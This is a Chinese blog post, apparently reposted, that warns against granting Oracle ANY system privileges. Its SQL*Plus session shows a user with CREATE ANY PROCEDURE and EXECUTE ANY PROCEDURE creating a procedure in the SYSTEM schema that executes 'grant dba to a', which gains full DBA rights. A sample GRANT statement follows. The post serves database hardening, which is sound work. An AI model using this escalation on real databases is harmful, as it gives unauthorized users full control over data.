Oracle推荐给用户授予权限时,给予用户可以完成操作的最小权限。应当尽量避免对用户授予包含ANY的系统权限,如SELECT ANY TABLE,
CREATE ANY TABLE等。这些包含ANY的系统权限很大,只应该授权给DBA用户,而不应该授权给普通用户。如果给非DBA用户授权ANY系统权限,则会使数据库处于不安全状态。下面的例子展示了一个用户具有了CREATE ANY PROCEDURE和EXECUTE ANY PROCEDURE权限,就可以通过其他方式获取数据库中所有的权限。

SQL> create user a identified by a;

用户已创建

SQL> grant create session to a;

授权成功。

SQL> grant create any procedure, execute any procedure to a;

授权成功。

SQL> conn a/a@test4
已连接。
SQL> select * from session_privs; PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE SQL> select * from session_roles; 未选定行 SQL> create procedure system.p_execute(p_str in varchar2) as
2 begin
3 execute immediate p_str;
4 end;
5 / 过程已创建。 SQL> exec system.p_execute('grant dba to a'); PL/SQL 过程已成功完成。 SQL> conn a/a@test4
已连接。
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
.
.
.
ALTER ANY RULE SET
DROP ANY RULE SET
EXECUTE ANY RULE SET 已选择140行。 SQL> select * from session_roles; ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
WM_ADMIN_ROLE 已选择9行。

授权实例,生产环境应避免any

--授权
GRANT
CONNECT,
RESOURCE,
--DBA,
--unlimited tablespace,
CREATE SESSION,
CREATE ANY SEQUENCE,
CREATE ANY TABLE,
CREATE ANY VIEW ,
CREATE ANY INDEX,
CREATE ANY PROCEDURE,
CREATE ANY DIRECTORY,
ALTER SESSION,
ALTER ANY SEQUENCE,
ALTER ANY TABLE,
--ALTER ANY VIEW , --不能修改视图
ALTER ANY INDEX,
ALTER ANY PROCEDURE,
--ALTER ANY DIRECTORY, --不能修改目录
--DROP SESSION, --不能删除Session
DROP ANY SEQUENCE,
DROP ANY TABLE,
DROP ANY VIEW ,
DROP ANY INDEX,
DROP ANY PROCEDURE,
DROP ANY DIRECTORY,
SELECT ANY TABLE,
SELECT ANY DICTIONARY,
INSERT ANY TABLE,
UPDATE ANY TABLE,
DELETE ANY TABLE,
DEBUG ANY PROCEDURE,
DEBUG CONNECT SESSION,
exp_full_database,
imp_full_database
TO xcj01;

转自<http://blog.itpub.net/4227/viewspace-68640/>

最新文章

  1. 今天Windows Azure Live to Code的分享
  2. javaweb学习总结(四十二)——Filter(过滤器)学习
  3. composer错误收集
  4. Unity操作
  5. [最短路径SPFA] POJ 1847 Tram
  6. RFID 基础/分类/编码/调制/传输
  7. tarjan求强联通分量 模板
  8. Java custom annotations
  9. Linux 命令 - top: 动态显示进程信息
  10. mysql 操作指令笔记
  11. C语言 创建一个 txt 文件 bin输入字符 保存文件在工作文件夹里
  12. 初试PL/SQL并行编程
  13. li里的a标签浮动了,为什么li本身也浮动了?
  14. .net Core1.0 邮件发送
  15. 打造基于Clang LibTooling的iOS自动打点系统CLAS(三)
  16. 【RN6752】模拟高清AHD芯片或成为车机新标配
  17. Redux 介绍
  18. 如何搭建modem编译环境
  19. 20175208 张家华 MyOD
  20. 完成一个Laravel项目的过程

热门文章

  1. js 事件调度
  2. Yii2 cache的用法(1)
  3. Maven最佳实践-distributionManagement
  4. android 自己定义TextView&amp;quot;会发脾气的TextView&amp;quot;
  5. 在selenium中使用css选择器进行元素定位
  6. Java编程思想学习笔记——一切都是对象
  7. Android学习之——SpannableString和TextView的使用及研究
  8. 分页功能实现之通过ajax实现表单内容刷新
  9. sql 理解
  10. jdbc数据访问技术